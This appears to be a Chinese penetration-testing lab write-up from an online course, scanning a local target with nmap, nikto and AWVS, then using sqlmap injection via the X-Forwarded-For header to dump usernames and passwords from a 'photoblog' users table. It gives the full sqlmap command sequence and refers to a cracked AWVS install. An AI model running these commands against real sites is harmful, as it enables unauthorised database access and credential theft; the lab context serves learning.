51CTO的网课,本篇利用nmap搜索开放端口,nikto挖掘敏感目录,使用AWVS扫描网站可利用漏洞,最后使用sqlmap进行X-Forwarded-For参数注入,获得用户名和口令,登录网站后台。
本篇使用工具AWVS,sqlmap。
使用命令
AWVS
AWVS13破解版的kali安装教程见:
AWVS13破解版安装_kali
sqlmap
1 2 3 4 5
| sqlmap -u "url" --headers="X-Forwarded-For:*" --dbs --batch sqlmap -u "url" --headers="X-Forwarded-For:*" -D [‘数据库名’] --tables --batch sqlmap -u "url" --headers="X-Forwarded-For:*" -D [‘数据库名’] -T [‘表名’] --columns --batch sqlmap -u "url" --headers="X-Forwarded-For:*" -D [‘数据库名’] -T [‘表名’] -C [‘字段名1,字段名2,…’] --dump --batch
|
渗透记录
- nmap扫描靶机IP地址开放端口,一个web服务:
nikto
挖掘80
端口web信息,找到一个登录页面:
1
| nikto -host http://192.168.1.117/
|
- 访问登录页面,尝试弱口令admin登录失败,另外这个页面在首页也有:
- 使用AWVS,新建target为192.168.1.117:
- 设置Report为
developer
,开始扫描:
- 右下角有实时扫描,红色是高危漏洞:
- 点进去可以看到详细信息:
- sqlmap使用X-Forwarded-For参数扫描,获取到数据库列表:
1
| sqlmap -u "http://192.168.1.117/" --headers="X-Forwarded-For:*" --dbs --batch
|
- 查看敏感数据库
photoblog
的用户表:
1
| sqlmap -u "http://192.168.1.117/" --headers="X-Forwarded-For:*" -D photoblog --tables --batch
|
- 查看
users
表的列:
1
| sqlmap -u "http://192.168.1.117/" --headers="X-Forwarded-For:*" -D photoblog -T users --cloumns --batch
|
- 查看
login
和password
列的内容,得到用户密码:
1
| sqlmap -u "http://192.168.1.117/" --headers="X-Forwarded-For:*" -D photoblog -T users -C "login,password" --dump --batch
|
- 利用用户名和密码可登录网站后台,因为没有开启ssh服务,所以不登录靶机。
参考资料
- 2020发布 CTF基础入门/CTF教程零基础 渗透测试/web安全/CTF夺旗【整套教程】
- AWVS13破解版安装_kali_